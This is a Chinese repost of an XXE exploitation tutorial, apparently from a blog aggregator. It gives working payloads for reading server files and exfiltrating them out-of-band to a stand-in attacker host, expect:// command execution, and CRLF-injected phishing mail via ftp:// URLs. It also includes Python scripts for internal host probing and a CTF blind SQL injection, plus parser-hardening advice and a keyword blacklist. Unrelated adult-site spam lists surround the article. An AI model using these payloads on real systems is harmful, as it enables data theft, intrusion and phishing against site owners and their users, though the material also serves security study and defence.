日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > asp.net >内容正文

asp.net

XXE漏洞利用技巧(XML注入):从XML到远程代码执行

發布時間:2025/3/15 asp.net 52 豆豆
生活随笔 收集整理的這篇文章主要介紹了 XXE漏洞利用技巧(XML注入):从XML到远程代码执行 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

什么是XXE

基本利用

Blind OOB XXE

場景1 - 端口掃描

場景2 - 通過DTD竊取文件

場景3 - 遠程代碼執行

場景4 - 釣魚

場景4 - HTTP 內網主機探測

場景5?- 內網盲注(CTF)

場景6?- 文件上傳

緩解措施

真實的 XXE 出現在哪

實例一:模擬情況

實例二:微信支付的 XXE

實例三:JSON content-type XXE

六、XXE 如何防御

方案一:使用語言中推薦的禁用外部實體的方法

方案二:手動黑名單過濾(不推薦)


什么是XXE

簡單來說,XXE就是XML外部實體注入。當允許引用外部實體時,通過構造惡意內容,就可能導致任意文件讀取、系統命令執行、內網端口探測、攻擊內網網站等危害。

例如,如果你當前使用的程序為PHP,則可以將libxml_disable_entity_loader設置為TRUE來禁用外部實體,從而起到防御的目的。

基本利用

通常攻擊者會將payload注入XML文件中,一旦文件被執行,將會讀取服務器上的本地文件,并對內網發起訪問掃描內部網絡端口。換而言之,XXE是一種從本地到達各種服務的方法。此外,在一定程度上這也可能幫助攻擊者繞過防火墻規則過濾或身份驗證檢查。

以下是一個簡單的XML代碼POST請求示例:

POST /vulnerable HTTP/1.1 Host: www.test.com User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://test.com/test.html Content-Type: application/xml Content-Length: 294 Cookie: mycookie=cookies; Connection: close Upgrade-Insecure-Requests: 1<?xml version="1.0"?> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>XML is the best!</description></core> </catalog>

之后,上述代碼將交由服務器的XML處理器解析。代碼被解釋并返回:{"Request Successful": "Added!"}

現在,當攻擊者試圖濫用XML代碼解析時會發生什么?讓我們編輯代碼并包含我們的惡意payload:

<?xml version="1.0"?> <!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>&xxe;</description></core> </catalog>

代碼被解釋并返回:

{"error": "no results for description root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync...

還有比較明顯的

http頭出現 Content-type:text/xml 很有可能存在XXE漏洞

畢竟還有這兩個是大殺器

1.https://fofa.so/

header=xml && country=IN (讀者可以自行搜索試下)

2.www.shodan.io?(無研究,需head中有text/xml思路即可)

Blind OOB XXE

如上例所示,服務器將/etc/passwd文件的內容作為響應返回給我們的XXE。但是在某些情況下,即便服務器可能存在XXE,也不會向攻擊者的瀏覽器或代理返回任何響應。遇到這種情況,我們可以使用Blind XXE漏洞來構建一條外帶數據(OOB)通道來讀取數據。雖然我們無法直接查看文件內容,但我們仍然可以使用易受攻擊的服務器作為代理,在外部網絡上執行掃描以及代碼。

場景1 - 端口掃描

在第一個示例中,我們通過URI將請求指向了/etc/passwd文件,并最終成功的為我們返回了文件中的內容。除此之外,我們也可以使用http URI并強制服務器向我們指定的端點和端口發送GET請求,將XXE轉換為SSRF(服務器端請求偽造)。

以下代碼將嘗試與端口8080通信,根據響應時間/長度,攻擊者將可以判斷該端口是否已被開啟。

<?xml version="1.0"?> <!DOCTYPE GVI [<!ENTITY xxe SYSTEM "http://127.0.0.1:8080" >]> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>&xxe;</description></core> </catalog>

場景2 - 通過DTD竊取文件

外部文檔類型定義(DTD)文件可被用于觸發OOB XXE。攻擊者將.dtd文件托管在VPS上,使遠程易受攻擊的服務器獲取該文件并執行其中的惡意命令。

以下請求將被發送到應用程序以演示和測試該方法:

<?xml version="1.0"?> <!DOCTYPE data SYSTEM "http://ATTACKERSERVER.com/xxe_file.dtd"> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>&xxe;</description></core> </catalog>

上述代碼一旦由易受攻擊的服務器處理,就會向我們的遠程服務器發送請求,查找包含我們的payload的DTD文件:

<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % all "<!ENTITY xxe SYSTEM 'http://ATTACKESERVER.com/?%file;'>"> %all;

讓我們花點時間了解上述請求的執行流程。結果是有兩個請求被發送到了我們的服務器,第二個請求為/etc/passwd文件的內容。

在我們的VPS日志中我們可以看到,帶有文件內容的第二個請求,以此我們也確認了OOB XXE漏洞的存在:

http://ATTACKERSERVER.com/?daemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fbin%2Fsh%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fbin%2Fsh

場景3 - 遠程代碼執行

這種情況很少發生,但有些情況下攻擊者能夠通過XXE執行代碼,這主要是由于配置不當/開發內部應用導致的。如果我們足夠幸運,并且PHP expect模塊被加載到了易受攻擊的系統或處理XML的內部應用程序上,那么我們就可以執行如下的命令:

<?xml version="1.0"?> <!DOCTYPE GVI [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" >]> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>&xxe;</description></core> </catalog>

響應:

{"error": "no results for description uid=0(root) gid=0(root) groups=0(root)...

場景4 - 釣魚

我們使用Java的XML解析器找到了一個易受攻擊的端點。掃描內部端口后,我們發現了一個偵聽在25端口的SMTP服務,Java支持在sun.net.ftp.impl.FtpClient中的ftp URI。因此,我們可以指定用戶名和密碼,例如ftp://user:password@host:port/test.txt,FTP客戶端將在連接中發送相應的USER命令。

但是如果我們將%0D%0A?(CRLF)添加到URL的user部分的任意位置,我們就可以終止USER命令并向FTP會話中注入一個新的命令,即允許我們向25端口發送任意的SMTP命令:

ftp://a%0D%0A EHLO%20a%0D%0A MAIL%20FROM%3A%3Csupport%40VULNERABLESYSTEM.com%3E%0D%0A RCPT%20TO%3A%3Cvictim%40gmail.com%3E%0D%0A DATA%0D%0A From%3A%20support%40VULNERABLESYSTEM.com%0A To%3A%20victim%40gmail.com%0A Subject%3A%20test%0A %0A test!%0A %0D%0A .%0D%0A QUIT%0D%0A :a@VULNERABLESYSTEM.com:25

當FTP客戶端使用此URL連接時,以下命令將會被發送給VULNERABLESYSTEM.com上的郵件服務器:

ftp://a EHLO a MAIL FROM: <support@VULNERABLESYSTEM.com> RCPT TO: <victim@gmail.com> DATA From: support@VULNERABLESYSTEM.com To: victim@gmail.com Subject: Reset your password We need to confirm your identity. Confirm your password here: http://PHISHING_URL.com . QUIT :support@VULNERABLESYSTEM.com:25

這意味著攻擊者可以從從受信任的來源發送釣魚郵件(例如:帳戶重置鏈接)并繞過垃圾郵件過濾器的檢測。除了鏈接之外,甚至我們也可以發送附件。

場景4 - HTTP 內網主機探測

我們以存在 XXE 漏洞的服務器為我們探測內網的支點。要進行內網探測我們還需要做一些準備工作,我們需要先利用 file 協議讀取我們作為支點服務器的網絡配置文件,看一下有沒有內網,以及網段大概是什么樣子(我以linux 為例),我們可以嘗試讀取 /etc/network/interfaces 或者 /proc/net/arp 或者 /etc/host 文件以后我們就有了大致的探測方向了

下面是一個探測腳本的實例:

import requests import base64#Origtional XML that the server accepts #<xml> # <stuff>user</stuff> #</xml>def build_xml(string):xml = """<?xml version="1.0" encoding="ISO-8859-1"?>"""xml = xml + "\r\n" + """<!DOCTYPE foo [ <!ELEMENT foo ANY >"""xml = xml + "\r\n" + """<!ENTITY xxe SYSTEM """ + '"' + string + '"' + """>]>"""xml = xml + "\r\n" + """<xml>"""xml = xml + "\r\n" + """ <stuff>&xxe;</stuff>"""xml = xml + "\r\n" + """</xml>"""send_xml(xml)def send_xml(xml):headers = {'Content-Type': 'application/xml'}x = requests.post('http://34.200.157.128/CUSTOM/NEW_XEE.php', data=xml, headers=headers, timeout=5).textcoded_string = x.split(' ')[-2] # a little split to get only the base64 encoded valueprint coded_string # print base64.b64decode(coded_string) for i in range(1, 255):try:i = str(i)ip = '10.0.0.' + istring = 'php://filter/convert.base64-encode/resource=http://' + ip + '/'print stringbuild_xml(string)except: continue

返回結果:

場景5?- 內網盲注(CTF)

2018 強網杯 有一道題就是利用 XXE 漏洞進行內網的 SQL 盲注的,大致的思路如下:

首先在外網的一臺ip地址為 39.107.33.75:33899 的評論框處測試發現 XXE 漏洞,我們輸入 xml 以及 dtd 會出現報錯

如圖所示:

既然如此,那么我們是不是能讀取該服務器上面的文件,我們先讀配置文件(這個點是 Blind XXE ,必須使用參數實體,外部引用 DTD )

/var/www/52dandan.cc/public_html/config.php

拿到第一部分 flag

<?php define(BASEDIR, "/var/www/52dandan.club/"); define(FLAG_SIG, 1); define(SECRETFILE,'/var/www/52dandan.com/public_html/youwillneverknowthisfile_e2cd3614b63ccdcbfe7c8f07376fe431'); .... ?>

注意:

這里有一個小技巧,當我們使用 libxml 讀取文件內容的時候,文件不能過大,如果太大就會報錯,于是我們就需要使用 php
過濾器的一個壓縮的方法

壓縮:echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd");
解壓:echo file_get_contents("php://filter/read=convert.base64-decode/zlib.inflate/resource=/tmp/1");

然后我們考慮內網有沒有東西,我們讀取

/proc/net/arp /etc/host

找到內網的另一臺服務器的 ip 地址 192.168.223.18

拿到這個 ip 我們考慮就要使用 XXE 進行端口掃描了,然后我們發現開放了 80 端口,然后我們再進行目錄掃描,找到一個 test.php ,根據提示,這個頁面的 shop 參數存在一個注入,但是因為本身這個就是一個 Blind XXE ,我們的對服務器的請求都是在我們的遠程 DTD 中包含的,現在我們需要改變我們的請求,那我們就要在每一次修改請求的時候修改我們遠程服務器的 DTD 文件,于是我們的腳本就要掛在我們的 VPS 上,一邊邊修改 DTD 一邊向存在 XXE 漏洞的主機發送請求,腳本就像下面這個樣子

示例代碼:

import requests url = 'http://39.107.33.75:33899/common.php' s = requests.Session() result = '' data = {"name":"evil_man","email":"testabcdefg@gmail.com","comment":"""<?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://evil_host/evil.dtd">%dtd;]>""" }for i in range(0,28):for j in range(48,123):f = open('./evil.dtd','w')payload2 = """<!ENTITY % file SYSTEM "php://filter/read=zlib.deflate/convert.base64-encode/resource=http://192.168.223.18/test.php?shop=3'-(case%a0when((select%a0group_concat(total)%a0from%a0albert_shop)like%a0binary('{}'))then(0)else(1)end)-'1"><!ENTITY % all "<!ENTITY % send SYSTEM 'http://evil_host/?result=%file;'>">%all;%send;""".format('_'*i+chr(j)+'_'*(27-i))f.write(payload2)f.close()print 'test {}'.format(chr(j))r = s.post(url,data=data)if "Oti3a3LeLPdkPkqKF84xs=" in r.content and chr(j)!='_':result += chr(j)print chr(j)break print result

這道題難度比加大,做起來也非常的耗時,所有的東西都要靠腳本去猜,因此當時是0解

場景6?- 文件上傳

我們之前說的好像都是 php 相關,但是實際上現實中很多都是 java 的框架出現的 XXE 漏洞,通過閱讀文檔,我發現 Java 中有一個比較神奇的協議 jar:// , php 中的 phar:// 似乎就是為了實現 jar:// 的類似的功能設計出來的。

jar:// 協議的格式:

jar:{url}!{path}

實例:

jar:http://host/application.jar!/file/within/the/zip這個 ! 后面就是其需要從中解壓出的文件

jar 能從遠程獲取 jar 文件,然后將其中的內容進行解壓,等等,這個功能似乎比 phar 強大啊,phar:// 是沒法遠程加載文件的(因此 phar:// 一般用于繞過文件上傳,在一些2016年的HCTF中考察過這個知識點,我也曾在校賽中出過類似的題目,奧,2018年的 blackhat 講述的 phar:// 的反序列化很有趣,Orange 曾在2017年的 hitcon 中出過這道題)

jar 協議處理文件的過程:

(1) 下載 jar/zip 文件到臨時文件中
(2) 提取出我們指定的文件
(3) 刪除臨時文件

那么我們怎么找到我們下載的臨時文件呢?

因為在 java 中 file:/// 協議可以起到列目錄的作用,所以我們能用 file:/// 協議配合 jar:// 協議使用

下面是我的一些測試過程:

我首先在本地模擬一個存在 XXE 的程序,網上找的能直接解析 XML 文件的 java 源碼

示例代碼:

xml_test.java

package xml_test; import java.io.File;import javax.xml.parsers.DocumentBuilder; import javax.xml.parsers.DocumentBuilderFactory;import org.w3c.dom.Attr; import org.w3c.dom.Comment; import org.w3c.dom.Document; import org.w3c.dom.Element; import org.w3c.dom.NamedNodeMap; import org.w3c.dom.Node; import org.w3c.dom.NodeList;/*** 使用遞歸解析給定的任意一個xml文檔并且將其內容輸出到命令行上* @author zhanglong**/ public class xml_test {public static void main(String[] args) throws Exception{DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();DocumentBuilder db = dbf.newDocumentBuilder();Document doc = db.parse(new File("student.xml"));//獲得根元素結點Element root = doc.getDocumentElement();parseElement(root);}private static void parseElement(Element element){String tagName = element.getNodeName();NodeList children = element.getChildNodes();System.out.print("<" + tagName);//element元素的所有屬性所構成的NamedNodeMap對象,需要對其進行判斷NamedNodeMap map = element.getAttributes();//如果該元素存在屬性if(null != map){for(int i = 0; i < map.getLength(); i++){//獲得該元素的每一個屬性Attr attr = (Attr)map.item(i);String attrName = attr.getName();String attrValue = attr.getValue();System.out.print(" " + attrName + "=\"" + attrValue + "\"");}}System.out.print(">");for(int i = 0; i < children.getLength(); i++){Node node = children.item(i);//獲得結點的類型short nodeType = node.getNodeType();if(nodeType == Node.ELEMENT_NODE){//是元素,繼續遞歸parseElement((Element)node);}else if(nodeType == Node.TEXT_NODE){//遞歸出口System.out.print(node.getNodeValue());}else if(nodeType == Node.COMMENT_NODE){System.out.print("<!--");Comment comment = (Comment)node;//注釋內容String data = comment.getData();System.out.print(data);System.out.print("-->");}}System.out.print("</" + tagName + ">");} }

有了這個源碼以后,我們需要在本地建立一個 xml 文件 ,我取名為 student.xml

student.xml

<!DOCTYPE convert [ <!ENTITY remote SYSTEM "jar:http://localhost:9999/jar.zip!/wm.php"> ]> <convert>&remote;</convert>

目錄結構如下圖:

可以清楚地看到我的請求是向自己本地的 9999 端口發出的,那么9999 端口上有什么服務呢?實際上是我自己用 python 寫的一個 TCP 服務器

示例代碼:

sever.py

import sys import time import threading import socketserver from urllib.parse import quote import http.client as httpc listen_host = 'localhost' listen_port = 9999 jar_file = sys.argv[1]class JarRequestHandler(socketserver.BaseRequestHandler): def handle(self):http_req = b''print('New connection:',self.client_address)while b'\r\n\r\n' not in http_req:try:http_req += self.request.recv(4096)print('Client req:\r\n',http_req.decode())jf = open(jar_file, 'rb')contents = jf.read()headers = ('''HTTP/1.0 200 OK\r\n''''''Content-Type: application/java-archive\r\n\r\n''')self.request.sendall(headers.encode('ascii'))self.request.sendall(contents[:-1])time.sleep(30)print(30)self.request.sendall(contents[-1:])except Exception as e:print ("get error at:"+str(e))if __name__ == '__main__':jarserver = socketserver.TCPServer((listen_host,listen_port), JarRequestHandler) print ('waiting for connection...') server_thread = threading.Thread(target=jarserver.serve_forever) server_thread.daemon = True server_thread.start() server_thread.join()

這個服務器的目的就是接受客戶端的請求,然后向客戶端發送一個我們運行時就傳入的參數指定的文件,但是還沒完,實際上我在這里加了一個 sleep(30),這個的目的我后面再說

既然是文件上傳,那我們又要回到 jar 協議解析文件的過程中了

jar 協議處理文件的過程:

(1) 下載 jar/zip 文件到臨時文件中
(2) 提取出我們指定的文件
(3) 刪除臨時文件

那我們怎么找到這個臨時的文件夾呢?不用想,肯定是通過報錯的形式展現,如果我們請求的

jar:http://localhost:9999/jar.zip!/1.php

1.php 在這個 jar.zip 中沒有的話,java 解析器就會報錯,說在這個臨時文件中找不到這個文件

如下圖:

既然找到了臨時文件的路徑,我們就要考慮怎么使用這個文件了(或者說怎么讓這個文件能更長時間的停留在我們的系統之中,我想到的方式就是sleep())但是還有一個問題,因為我們要利用的時候肯定是在文件沒有完全傳輸成果的時候,因此為了文件的完整性,我考慮在傳輸前就使用 hex 編輯器在文件末尾添加垃圾字符,這樣就能完美的解決這個問題

下面是我的實驗錄屏:

https://xzfile.aliyuncs.com/media/upload/picture/20181120002650-eae69596-ec17-1.gif

實驗就到這一步了,怎么利用就看各位大佬的了(壞笑)

我后來在LCTF 2018 出了這樣一個 CTF 題目,詳細的 wp 可以看我的這篇文章

緩解措施

上面討論的主要問題就是XML解析器解析了用戶發送的不可信數據。然而,要去校驗DTD(document type definition)中SYSTEM標識符定義的數據,并不容易,也不大可能。大部分的XML解析器默認對于XXE攻擊是脆弱的。因此,最好的解決辦法就是配置XML處理器去使用本地靜態的DTD,不允許XML中含有任何自己聲明的DTD。

真實的 XXE 出現在哪

我們剛剛說了那么多,都是只是我們對這個漏洞的理解,但是好像還沒說這種漏洞出現在什么地方

如今的 web 時代,是一個前后端分離的時代,有人說 MVC 就是前后端分離,但我覺得這種分離的并不徹底,后端還是要嘗試去調用渲染類去控制前端的渲染,我所說的前后端分離是,后端 api 只負責接受約定好要傳入的數據,然后經過一系列的黑盒運算,將得到結果以 json 格式返回給前端,前端只負責坐享其成,拿到數據json.decode 就行了(這里的后端可以是后臺代碼,也可以是外部的api 接口,這里的前端可以是傳統意義的前端,也可以是后臺代碼)

那么問題經常就出現在 api 接口能解析客戶端傳過來的 xml 代碼,并且直接外部實體的引用,比如下面這個

實例一:模擬情況

示例代碼:

POST /vulnerable HTTP/1.1 Host: www.test.com User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://test.com/test.html Content-Type: application/xml Content-Length: 294 Cookie: mycookie=cookies; Connection: close Upgrade-Insecure-Requests: 1<?xml version="1.0"?> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>XML is the best!</description></core> </catalog>

我們發出 帶有 xml 的 POST 請求以后,述代碼將交由服務器的XML處理器解析。代碼被解釋并返回:{“Request Successful”: “Added!”}

但是如果我們傳入一個惡意的代碼

<?xml version="1.0"?> <!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <catalog><core id="test101"><author>John, Doe</author><title>I love XML</title><category>Computers</category><price>9.99</price><date>2018-10-01</date><description>&xxe;</description></core> </catalog>

如果沒有做好“安全措施” 就會出現解析惡意代碼的情況,就會有下面的返回

{"error": "no results for description root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync...

實例二:微信支付的 XXE

前一陣子非常火的微信支付的 XXE 漏洞當然不得不提,

漏洞描述:

微信支付提供了一個 api 接口,供商家接收異步支付結果,微信支付所用的java sdk在處理結果時可能觸發一個XXE漏洞,攻擊者可以向這個接口發送構造惡意payloads,獲取商家服務器上的任何信息,一旦攻擊者獲得了敏感的數據 (md5-key and merchant-Id etc.),他可能通過發送偽造的信息不用花錢就購買商家任意物品

我下載了 java 版本的 sdk 進行分析,這個 sdk 提供了一個 WXPayUtil 工具類,該類中實現了xmltoMap和maptoXml這兩個方法,而這次的微信支付的xxe漏洞爆發點就在xmltoMap方法中

如圖所示:

問題就出現在我橫線劃出來的那部分,也就是簡化為下面的代碼:

public static Map<String, String> xmlToMap(String strXML) throws Exception {try {Map<String, String> data = new HashMap<String, String>();DocumentBuilder documentBuilder = WXPayXmlUtil.newDocumentBuilder();InputStream stream = new ByteArrayInputStream(strXML.getBytes("UTF-8"));org.w3c.dom.Document doc = documentBuilder.parse(stream);...

我們可以看到 當構建了 documentBuilder 以后就直接對傳進來的 strXML 解析了,而不巧的是 strXML 是一處攻擊者可控的參數,于是就出現了 XXE 漏洞,下面是我實驗的步驟

首先我在 com 包下又新建了一個包,來寫我們的測試代碼,測試代碼我命名為 test001.java

如圖所示:

test001.java

package com.test.test001; import java.util.Map; import static com.github.wxpay.sdk.WXPayUtil.xmlToMap;public class test001 {public static void main(String args[]) throws Exception {String xmlStr ="<?xml version='1.0' encoding='utf-8'?>\r\n" +"<!DOCTYPE XDSEC [\r\n" +"<!ENTITY xxe SYSTEM 'file:///d:/1.txt'>]>\r\n" +"<XDSEC>\r\n"+"<XXE>&xxe;</XXE>\r\n" +"</XDSEC>";try{Map<String,String> test = xmlToMap(xmlStr);System.out.println(test);}catch (Exception e){e.printStackTrace();}} }

我希望它能讀取我 D 盤下面的 1.txt 文件

運行后成功讀取

如圖所示:

當然,WXPayXmlUtil.java 中有這個 sdk 的配置項,能直接決定實驗的效果,當然后期的修復也是針對這里面進行修復的

http://apache.org/xml/features/disallow-doctype-decl true http://apache.org/xml/features/nonvalidating/load-external-dtd false http://xml.org/sax/features/external-general-entities false http://xml.org/sax/features/external-parameter-entities false

整個源碼我打包好了已經上傳到我的百度云,有興趣的童鞋可以運行一下感受:

鏈接:百度網盤 請輸入提取碼?提取碼:xq1b

上面說過 java 中有一個 netdoc:/ 協議能代替 file:/// ,我現在來演示一下:

如圖所示:

實例三:JSON content-type XXE

正如我們所知道的,很多web和移動應用都基于客戶端-服務器交互模式的web通信服務。不管是SOAP還是RESTful,一般對于web服務來說,最常見的數據格式都是XML和JSON。盡管web服務可能在編程時只使用其中一種格式,但服務器卻可以接受開發人員并沒有預料到的其他數據格式,這就有可能會導致JSON節點受到XXE(XML外部實體)攻擊

原始請求和響應:

HTTP Request:

POST /netspi HTTP/1.1 Host: someserver.netspi.com Accept: application/json Content-Type: application/json Content-Length: 38{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 200 OK Content-Type: application/json Content-Length: 43{"error": "no results for name netspitest"}

現在我們嘗試將 Content-Type 修改為 application/xml

進一步請求和響應:

HTTP Request:

POST /netspi HTTP/1.1 Host: someserver.netspi.com Accept: application/json Content-Type: application/xml Content-Length: 38{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 500 Internal Server Error Content-Type: application/json Content-Length: 127{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}

可以發現服務器端是能處理 xml 數據的,于是我們就可以利用這個來進行攻擊

最終的請求和響應:

HTTP Request:

POST /netspi HTTP/1.1 Host: someserver.netspi.com Accept: application/json Content-Type: application/xml Content-Length: 288<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <search>name</search> <value>&xxe;</value> </root>

HTTP Response:

HTTP/1.1 200 OK Content-Type: application/json Content-Length: 2467{"error": "no results for name root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync....

六、XXE 如何防御

方案一:使用語言中推薦的禁用外部實體的方法

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false);.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);.setFeature("http://xml.org/sax/features/external-general-entities",false).setFeature("http://xml.org/sax/features/external-parameter-entities",false);

Python:

from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案二:手動黑名單過濾(不推薦)

過濾關鍵詞:

<!DOCTYPE、<!ENTITY SYSTEM、PUBLIC

總結

以上是生活随笔為你收集整理的XXE漏洞利用技巧(XML注入):从XML到远程代码执行的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

天天色天天干天天色 | 国产成人99久久亚洲综合精品 | 成人av免费在线观看 | 99热这里| 色综合咪咪久久网 | 久久久国产高清 | 天天翘av | 中文字幕免费一区 | 五月亚洲综合 | 日韩精品视频免费在线观看 | 成片人卡1卡2卡3手机免费看 | 色在线国产 | 免费精品久久久 | 亚洲午夜激情网 | 国产一区二区三区视频在线 | 国产一级二级在线观看 | 色91在线| 超碰公开97| 久草视频观看 | 亚洲欧美日韩精品久久久 | 欧美国产91 | 天堂网av在线 | 国产日韩欧美自拍 | 中文字幕亚洲欧美 | 一级黄色片在线观看 | 五月婷婷国产 | 久久综合五月 | 嫩草av在线 | 国产麻豆精品久久 | 欧美色图另类 | 亚洲色影爱久久精品 | 国产精品久久嫩一区二区免费 | 免费电影一区二区三区 | aaa日本高清在线播放免费观看 | 日本精品va在线观看 | 成人sm另类专区 | 中文av一区二区 | 久久综合久久综合这里只有精品 | 99精品黄色片免费大全 | 8x成人在线 | 国产成人精品在线观看 | 手机在线看a | 久久tv | 成年人三级网站 | 久久欧美精品 | 人人干人人添 | 亚洲欧美在线综合 | 狠狠狠色丁香综合久久天下网 | 久久亚洲人 | 国产精品一区二区三区在线免费观看 | 久久久久久久久久影视 | 国产一区二区三区在线免费观看 | 天天综合中文 | 国产一级高清视频 | 99re久久精品国产 | 日韩在线免费观看视频 | 国产精品一区二区三区久久 | 亚洲春色综合另类校园电影 | 亚洲最新av在线网站 | 97超碰在线资源 | 五月天久久综合网 | 精品视频不卡 | 一区二区精品 | 免费69视频| 2024国产精品视频 | 日韩首页| 国产1区2 | 精品亚洲免费 | 99在线热播精品免费 | 日韩一片| 国产99久久精品一区二区永久免费 | 四虎4hu永久免费 | 日韩在线观看高清 | 成人日批视频 | 69国产盗摄一区二区三区五区 | av在线影视 | 在线播放av网址 | 久久狠狠亚洲综合 | 亚洲精品在 | 欧美在线日韩在线 | 天天干天天干天天操 | 天天天色| 日韩综合一区二区三区 | 亚洲免费av网站 | 久久成人国产精品 | 91av视频在线观看 | 亚洲免费不卡 | 日韩在线高清 | 人人爽人人爽人人爽人人爽 | 日韩欧美高清视频在线观看 | 日本在线观看中文字幕 | 天天av天天 | 欧美日韩伦理在线 | 久射网| 国产精品美女免费视频 | 欧美日韩国产在线观看 | 欧美一级淫片videoshd | 久久精品一二三区 | 日本中文字幕在线电影 | 日本最大色倩网站www | 久久久精品午夜 | 97超碰人人网 | av一本久道久久波多野结衣 | 国产一级淫片免费看 | 亚洲无在线 | 免费观看全黄做爰大片国产 | 成人h在线播放 | 999久久久国产精品 高清av免费观看 | 欧美色图另类 | www.黄色| 日日碰夜夜爽 | 91黄在线看 | 精品国产午夜 | 五月网婷婷 | 国产精品久久久久久久av电影 | 韩国在线一区二区 | 日韩国产在线观看 | 天天天色综合a | 精品视频中文字幕 | 久久久久久久久久伊人 | 五月亚洲综合 | 99精品免费在线观看 | 99国产成+人+综合+亚洲 欧美 | 九九99 | 波多野结衣在线观看视频 | 久久狠狠干| 四虎影视精品 | 国产小视频福利在线 | 91在线观看视频网站 | 激情欧美丁香 | 99热99热| 国产亚洲精品bv在线观看 | 亚洲国产av精品毛片鲁大师 | 2021国产视频 | 欧美一级性生活视频 | 99热这里只有精品8 久久综合毛片 | 国产精品99久久99久久久二8 | 欧美黑人巨大xxxxx | 日韩精品一区二区在线观看 | 欧美在线一级片 | 久久视频一区二区 | 天天操天天操 | 99热超碰在线 | 国产成a人亚洲精v品在线观看 | 亚洲精品国产精品国自 | 综合铜03| 黄色精品在线看 | 亚洲aⅴ在线 | 国产精品va在线观看入 | 国产日韩欧美在线影视 | 天天干天天弄 | 亚洲免费av在线 | 久久噜噜少妇网站 | 欧美日韩在线观看一区二区三区 | 五月婷婷在线播放 | 亚洲午夜在线视频 | 国产日韩中文字幕在线 | 久久国产精品网站 | 国产精品一区二区在线播放 | 国产精品系列在线观看 | 国产亚洲精品久久久久动 | 激情网第四色 | 国内精品久久久 | 最新中文在线视频 | 91精品视屏 | 免费十分钟 | 九九九国产 | 天天操狠狠操夜夜操 | 永久免费精品视频网站 | 欧美日韩国产综合一区二区 | 亚洲高清在线视频 | 中文字幕久久久精品 | 精品三级av| 免费看的黄色 | 日本久久电影网 | 国产精品videoxxxx | 深爱激情综合 | 97狠狠干| 欧美日韩中文字幕综合视频 | 综合婷婷| 精品免费观看视频 | 一区二区三区在线免费观看视频 | 91免费在线视频 | 黄色软件视频大全免费下载 | 国产精品久久一区二区无卡 | 国偷自产视频一区二区久 | 免费的国产精品 | 久久99国产精品免费网站 | 日本久热 | 欧美日韩精品久久久 | 精品极品在线 | 麻豆传媒电影在线观看 | 99精品视频免费全部在线 | 久久国产精品免费视频 | 亚洲一级黄色av | 综合久久婷婷 | 日韩在线国产 | 国内精品毛片 | 99热超碰在线 | 日本巨乳在线 | 欧美日韩在线视频一区二区 | 91九色成人蝌蚪首页 | 国产黄色免费 | 在线观看日本高清mv视频 | 国产麻豆视频免费观看 | 久久国产欧美日韩精品 | 久久精品99国产精品酒店日本 | 五月婷婷中文网 | 国产免费大片 | 亚洲精品字幕在线 | 欧美在线视频一区二区三区 | 制服丝袜欧美 | 国产精品国产三级国产aⅴ9色 | 狠狠干2018| 有没有在线观看av | 一级片色播影院 | 激情五月视频 | 日韩av影视在线 | 97网| 看片在线亚洲 | 亚洲视频 在线观看 | www.久久久久 | 日韩欧美在线播放 | av免费线看| www.色com| www.夜色321.com| 中文字幕精品www乱入免费视频 | 